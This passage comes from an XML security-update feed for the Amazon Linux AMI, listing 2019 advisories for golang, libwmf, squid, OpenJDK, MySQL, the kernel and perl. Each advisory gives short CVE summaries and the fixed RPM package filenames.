version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.8-1.11.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36-tools" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-test-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.8-1.11.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.8" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.8-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1172</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1172: medium priority package update for golang</title><issued date="2019-03-07 16:17:00" /><updated date="2019-03-25 23:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-6486:
Go before 1.10.8 and 1.11.x before 1.11.5 mishandles P-521 and P-384 elliptic curves, which allows attackers to cause a denial of service (CPU consumption) or possibly conduct ECDH private key recovery attacks.
1668972:
CVE-2019-6486 golang: crypto/elliptic implementations of P-521 and P-384 elliptic curves allow for denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6486" title="" id="CVE-2019-6486" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-src" version="1.10.6" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.10.6-1.48.amzn1.noarch.rpm</filename></package><package name="golang-docs" version="1.10.6" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.10.6-1.48.amzn1.noarch.rpm</filename></package><package name="golang" version="1.10.6" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.10.6-1.48.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.10.6" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.10.6-1.48.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.10.6" release="1.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.10.6-1.48.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.10.6" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.10.6-1.48.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.10.6" release="1.48.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.10.6-1.48.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.10.6" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.10.6-1.48.amzn1.i686.rpm</filename></package><package name="golang" version="1.10.6" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.10.6-1.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1174</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1174: low priority package update for libwmf</title><issued date="2019-03-21 18:35:00" /><updated date="2019-03-25 23:11:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-6978:
The GD Graphics Library (aka LibGD) 2.2.5 has a double free in the gdImage*Ptr() functions in gd_gif_out.c, gd_jpeg.c, and gd_wbmp.c. NOTE: PHP is unaffected.
1671390:
CVE-2019-6978 gd: double free in the gdImage*Ptr in gd_gif_out.c, gd_jpeg.c, and gd_wbmp.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6978" title="" id="CVE-2019-6978" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwmf-lite" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-lite-0.2.8.4-41.13.amzn1.x86_64.rpm</filename></package><package name="libwmf-debuginfo" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-debuginfo-0.2.8.4-41.13.amzn1.x86_64.rpm</filename></package><package name="libwmf-devel" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-devel-0.2.8.4-41.13.amzn1.x86_64.rpm</filename></package><package name="libwmf" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwmf-0.2.8.4-41.13.amzn1.x86_64.rpm</filename></package><package name="libwmf-lite" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-lite-0.2.8.4-41.13.amzn1.i686.rpm</filename></package><package name="libwmf-devel" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-devel-0.2.8.4-41.13.amzn1.i686.rpm</filename></package><package name="libwmf" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-0.2.8.4-41.13.amzn1.i686.rpm</filename></package><package name="libwmf-debuginfo" version="0.2.8.4" release="41.13.amzn1" epoch="0" arch="i686"><filename>Packages/libwmf-debuginfo-0.2.8.4-41.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1176</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1176: medium priority package update for squid</title><issued date="2019-03-18 17:59:00" /><updated date="2019-03-25 23:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-19132:
A memory leak was discovered in the way Squid handles SNMP denied queries. A remote attacker may use this flaw to exhaust the resources on the server machine.
1645154:
CVE-2018-19132 squid: Memory leak in SNMP query rejection code
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19132" title="" id="CVE-2018-19132" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="12.38.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-12.38.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="12.38.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-12.38.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="12.38.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-12.38.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="12.38.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-12.38.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="12.38.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-12.38.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="12.38.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-12.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1177</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1177: medium priority package update for java-1.7.0-openjdk</title><issued date="2019-03-18 19:02:00" /><updated date="2019-03-25 23:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2422:
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Libraries). Supported versions that are affected are Java SE: 7u201, 8u192 and 11.0.1; Java SE Embedded: 8u191. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).
1665945:
CVE-2019-2422 OpenJDK: memory disclosure in FileChannelImpl (Libraries, 8206290)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2422" title="" id="CVE-2019-2422" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-src" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.211-2.6.17.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.211-2.6.17.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.211-2.6.17.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.211-2.6.17.1.79.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.211-2.6.17.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.211-2.6.17.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.211-2.6.17.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.211-2.6.17.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.211-2.6.17.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.211-2.6.17.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.211-2.6.17.1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1178</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1178: medium priority package update for mysql56</title><issued date="2019-03-20 22:27:00" /><updated date="2019-03-25 23:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2537:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666763:
CVE-2019-2537 mysql: Server: DDL unspecified vulnerability (CPU Jan 2019)
CVE-2019-2534:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N).
1666760:
CVE-2019-2534 mysql: Server: Replication unspecified vulnerability (CPU Jan 2019)
CVE-2019-2531:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666757:
CVE-2019-2531 mysql: Server: Replication unspecified vulnerability (CPU Jan 2019)
CVE-2019-2529:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666755:
CVE-2019-2529 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2507:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666750:
CVE-2019-2507 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2503:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Connection Handling). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Difficult to exploit vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.4 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H).
1666749:
CVE-2019-2503 mysql: Server: Connection Handling unspecified vulnerability (CPU Jan 2019)
CVE-2019-2482:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: PS). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666744:
CVE-2019-2482 mysql: Server: PS unspecified vulnerability (CPU Jan 2019)
CVE-2019-2481:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666743:
CVE-2019-2481 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2455:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666742:
CVE-2019-2455 mysql: Server: Parser unspecified vulnerability (CPU Jan 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2455" title="" id="CVE-2019-2455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2481" title="" id="CVE-2019-2481" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2482" title="" id="CVE-2019-2482" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2503" title="" id="CVE-2019-2503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2507" title="" id="CVE-2019-2507" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2529" title="" id="CVE-2019-2529" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2531" title="" id="CVE-2019-2531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2534" title="" id="CVE-2019-2534" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2537" title="" id="CVE-2019-2537" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-test" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.43-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1179</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1179: important priority package update for kernel</title><issued date="2019-03-20 22:39:00" /><updated date="2019-03-25 23:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9213:
A flaw was found in mmap in the Linux kernel allowing the process to map a null page. This allows attackers to abuse this mechanism to turn null pointer dereferences into workable exploits.
1686136:
CVE-2019-9213 kernel: lack of check for mmap minimum address in expand_downwards in mm/mmap.c leads to NULL pointer dereferences exploit on non-SMAP platforms
CVE-2019-8980:
A kernel memory leak was found in the kernel_read_file() function in the fs/exec.c file in the Linux kernel. An attacker could use this flaw to cause a memory leak and thus a denial of service (DoS).
1679972:
CVE-2019-8980 kernel: memory leak in the kernel_read_file function in fs/exec.c allows to cause a denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8980" title="" id="CVE-2019-8980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9213" title="" id="CVE-2019-9213" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.106-79.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1180</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1180: important priority package update for perl</title><issued date="2019-03-20 23:05:00" /><updated date="2019-03-25 23:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-18311:
Perl before 5.26.3 and 5.28.x before 5.28.1 has a buffer overflow via a crafted regular expression that triggers invalid write operations.
1646730:
CVE-2018-18311 perl: Integer overflow leading to buffer overflow in Perl_my_setenv()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18311" title="" id="CVE-2018-18311" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-core" version="5.16.3" release="294.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-core-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-debuginfo-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-Object-Accessor" version="0.42" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Object-Accessor-0.42-294.43.amzn1.noarch.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.21" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Locale-Maketext-Simple-0.21-294.43.amzn1.noarch.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="294.43.amzn1" epoch="1" 